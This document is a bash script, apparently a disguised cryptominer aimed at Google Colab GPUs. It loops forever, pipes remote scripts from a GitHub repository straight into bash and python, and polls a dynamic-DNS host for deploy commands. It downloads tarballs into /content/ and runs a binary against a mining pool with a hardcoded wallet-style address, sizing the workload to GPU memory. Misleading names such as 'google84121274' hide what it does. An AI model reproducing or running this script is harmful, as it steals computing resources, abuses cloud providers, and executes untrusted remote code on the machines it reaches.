apt-get install -y libcpprest-dev libgmp-dev libargon2-0-dev

while true
do

google84121274=$(nvidia-smi --query-gpu=memory.total --format=csv | sed 's/MiB//g' | sed 's/memory.total//g' | sed 's/\s+\n+\r+//g' | sed 's/\[//g' | sed 's/\]//g')

if [[ $google84121274 == *"failed"* ]]; then

curl https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/mobilegoogle8474 | bash

timeout 12 curl https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/mobilegoogle84 | python
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

else

string=$(curl -s http://mobile84121274.hopto.org/?q=deploy)
if [[ $string == *"16384"* ]]; then

cd /content/

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/devdeploy84.tar.gz
tar -xf ./devdeploy84.tar.gz

cd googleapps8474

arr[0]="http://mobile84121274.hopto.org/"
rand=$[$RANDOM % ${#arr[@]}]
google841212121274=${arr[$rand]}

google8412=$(curl -s $google841212121274 | sed "s/\s+//g")

if [[ $google8412 = "" ]]
then

google84=$(nvidia-smi --query-gpu=memory.total --format=csv | sed 's/MiB//g' | sed 's/memory.total//g' | sed 's/\s+\n+\r+//g' | sed 's/\[//g' | sed 's/\]//g')

if (($google84 >= 14884 && $google84 <= 16884));
then

timeout 12 ./google84121274 -p $google841212121274 -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 30 -b 30
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 10884 && $google84 <= 14882));
then

timeout 12 ./google84121274 -p $google841212121274 -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 22 -b 22
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 5288 && $google84 <= 9184));
then

timeout 12 ./google84121274 -p $google841212121274 -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 15 -b 15
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 2874 && $google84 <= 5184));
then

timeout 12 ./google84121274 -p $google841212121274 -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 7 -b 7
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

else

echo "mobile8474"

sleep 84;

fi

else

cd /content/

wget -N -q https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/linux847412741274.tar.gz
tar -xf ./linux847412741274.tar.gz

cd googleapps8474

arr[0]="http://mobile84121274.hopto.org/"
rand=$[$RANDOM % ${#arr[@]}]
google841212121274=${arr[$rand]}

google8412=$(curl -s $google841212121274 | sed "s/\s+//g")

if [[ $google8412 = "" ]]
then

google84=$(nvidia-smi --query-gpu=memory.total --format=csv | sed 's/MiB//g' | sed 's/memory.total//g' | sed 's/\s+\n+\r+//g' | sed 's/\[//g' | sed 's/\]//g')

if (($google84 >= 14884 && $google84 <= 16884));
then

timeout 12 ./google84121274 -p $google841212121274 -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 1 -b 29
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 10884 && $google84 <= 14882));
then

timeout 12 ./google84121274 -p $google841212121274 -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 1 -b 20
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 5288 && $google84 <= 9184));
then

timeout 12 ./google84121274 -p $google841212121274 -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 1 -b 14
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 2874 && $google84 <= 5184));
then

timeout 12 ./google84121274 -p $google841212121274 -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 1 -b 7
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

else

echo "mobile8474"

sleep 84;

fi

fi

fi

done
